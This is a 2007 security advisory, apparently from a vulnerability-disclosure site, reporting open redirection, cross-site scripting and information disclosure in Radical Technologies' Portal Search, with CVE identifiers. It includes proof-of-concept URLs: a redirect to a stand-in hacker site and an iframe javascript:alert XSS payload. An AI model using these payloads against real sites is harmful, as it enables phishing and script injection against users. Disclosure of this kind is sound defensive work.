Radical Technologies - Portal Search- multiple XSS issue

2007.02.17

Credit: Pedro Alexander Garcia

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2007-0923 | CVE-2007-0922 | CVE-2007-0921

CWE: CWE-79

Site : Raditech.es
Product : Portal Search (May be others)
Portal Search is a product that can help to search in one or multiple Web sites. http://www.raditech.es/esp/servicios/portal-search.shtml
This product can SEARCH and INDEX the contents of a entire web site,additionally this product doesn't validate user input. So these types of attacks are possible.
-URL redirection (So Phising attacks can be easy)
-Cross Site Scripting
-Business Logic can be revealed trough Searching some type of characters
-Some Others
-URL redirection
http://target/?http://www.hackersite.com
and the hacker site is displayed in the main FRAME of www.somesite.com
-Cross Site Scripting
http://target/buscador/buscador.htm?%3CIFRAME%20SRC=%22javascript:alert(
'XSS');%22%3E%3C/IFRAME%3E
The result of this URL is that all the records are displayed.
-Business Logic can be revealed trough Searching some type of characters.
http://target/buscador/buscador.htm?
Thanks and sorry by my English
Regards
Pedro Alexander Garcia
claxus (at) gmail (dot) com [email concealed]
Colombia 2007

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Radical Technologies - Portal Search- multiple XSS issue

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.